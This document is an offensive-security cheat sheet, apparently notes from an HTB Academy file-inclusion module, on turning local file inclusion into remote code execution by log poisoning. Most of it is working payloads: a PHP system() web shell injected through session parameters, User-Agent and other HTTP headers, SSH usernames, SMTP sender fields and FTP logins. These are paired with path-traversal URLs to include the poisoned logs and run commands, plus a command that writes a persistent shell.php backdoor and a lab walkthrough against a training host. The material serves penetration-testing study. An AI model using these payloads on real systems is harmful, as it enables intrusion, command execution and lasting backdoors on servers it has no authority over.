Log Poisoning Techniques
Overview
Log poisoning combines LFI with log file contamination to achieve remote code execution by injecting malicious code into log files that can later be included and executed.
Prerequisites:
LFI vulnerability allowing access to log files
Ability to control logged data (User-Agent, HTTP headers, SSH attempts, etc.)
Web server with write permissions to log files
Method 1: PHP Session Poisoning
Complete 5-Step Workflow
Step 1: Identify Session File Location
# Common PHP session locations
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
# Get PHPSESSID from cookies
curl -I http://target.com/ | grep -i set-cookieStep 2: Poison Session Data
# Include poisoned session via LFI
http://target.com/lfi.php?file=../../../../var/lib/php/sessions/sess_SESSIONID
# Inject PHP code into session
http://target.com/lfi.php?language=<?php system($_GET["cmd"]); ?>Step 3: Execute Commands
# Access session file with command parameter
http://target.com/lfi.php?file=../../../../var/lib/php/sessions/sess_SESSIONID&cmd=idMethod 2: Apache/Nginx Access Log Poisoning
User-Agent Poisoning
Step 1: Identify Log Location
# Apache logs
/var/log/apache2/access.log
/var/log/httpd/access_log
# Nginx logs
/var/log/nginx/access.logStep 2: Poison User-Agent Header
# Via curl
curl -s "http://target.com/" -H "User-Agent: <?php system(\$_GET['cmd']); ?>"
# Via Burp Suite
# Intercept request and modify User-Agent header
User-Agent: <?php system($_GET['cmd']); ?>Step 3: Execute via Log Inclusion
# Include poisoned access log
http://target.com/lfi.php?file=../../../../var/log/apache2/access.log&cmd=whoamiMethod 3: SSH Log Poisoning
SSH Auth Log Contamination
Step 1: Identify SSH Log Location
/var/log/auth.log # Debian/Ubuntu
/var/log/secure # CentOS/RHELStep 2: Poison SSH Login Attempts
# Inject PHP code in username
ssh '<?php system($_GET["cmd"]); ?>'@target.com
# Multiple attempts for reliable poisoning
for i in {1..5}; do
ssh '<?php system($_GET["cmd"]); ?>'@target.com
doneStep 3: Execute via Log Inclusion
http://target.com/lfi.php?file=../../../../var/log/auth.log&cmd=idMethod 4: Mail Log Poisoning
SMTP Log Contamination
Common Mail Logs:
/var/log/mail.log
/var/log/mail.err
/var/mail/www-dataPoisoning Technique:
# Send email with PHP payload in sender field
telnet target.com 25
MAIL FROM: <?php system($_GET["cmd"]); ?>Method 5: FTP Log Poisoning
FTP Authentication Logs
Log Locations:
/var/log/vsftpd.log
/var/log/ftp.logPoisoning via FTP Login:
ftp target.com
# Username: <?php system($_GET["cmd"]); ?>HTB Academy Log Poisoning Lab
Complete Lab Walkthrough
Objective: Achieve RCE via log poisoning and read flag
Step 1: Identify Vulnerable Parameter
http://83.136.254.199:58743/index.php?language=enStep 2: Test LFI
http://83.136.254.199:58743/index.php?language=../../../../etc/passwdStep 3: Identify Session Location
# Check for PHP sessions
http://83.136.254.199:58743/index.php?language=../../../../var/lib/php/sessions/sess_SESSIONIDStep 4: Poison Session
# Inject PHP code via language parameter
http://83.136.254.199:58743/index.php?language=<?php system($_GET["cmd"]); ?>Step 5: Execute Commands
# Include session with command execution
http://83.136.254.199:58743/index.php?language=../../../../var/lib/php/sessions/sess_SESSIONID&cmd=find / -name "*flag*" 2>/dev/nullAdvanced Log Poisoning Techniques
Multi-Field Poisoning
# Poison multiple HTTP headers
curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" \
-H "X-Forwarded-For: <?php system(\$_GET['cmd2']); ?>" \
-H "Referer: <?php system(\$_GET['cmd3']); ?>" \
http://target.com/Persistent Shell Creation
# Create persistent backdoor in logs
curl -H "User-Agent: <?php file_put_contents('shell.php', '<?php system(\$_GET[\"cmd\"]); ?>'); ?>" \
http://target.com/[Content continues with troubleshooting and additional techniques...]
This guide covers advanced log poisoning techniques from HTB Academy's File Inclusion module.
Last updated